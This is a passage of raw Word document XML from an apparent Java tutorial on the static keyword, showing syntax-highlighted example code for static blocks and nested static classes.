        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Outputs: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241653B0" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342226F" w14:textId="4BB6FE54" w:rsidR="00E004B0" w:rsidRPr="00E004B0" w:rsidRDefault="00E004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0299883"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00E004B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3E179" w14:textId="77777777" w:rsidR="00E004B0" w:rsidRDefault="00E004B0" w:rsidP="003E427B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0503CA38" w14:textId="4647ADD0" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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3. Static Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D718967" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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static block is used for static initialization of a class. It is executed only once when the class is loaded into memory (before any constructor or method is called).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B12411" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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is commonly used for initialization tasks like setting up static variables or performing one-time setup actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1462A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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743C722A" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InitializationExample</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4B695" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D5FC0" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Static block executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F189F" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30007DBB" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE42CFA" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559E3595" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Main method executed"</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A68E6" w14:textId="77777777"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A34473" w14:textId="06D4B2CF"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540703"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43638A3A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAB261" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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tic block executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A0EE1" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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in method executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F986D5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Key Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static blocks are executed in the order they appear in the class, and only once per class load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB682F4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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Static Classes (Nested Static Classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCAAD79" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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static class is a nested class that is associated with the outer class, but it does not have access to instance variables and methods of the outer class. It can only access the static members of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236DC4D7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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7A22802A" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Outer</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BC8C4" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVar </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71C445" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46836654" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
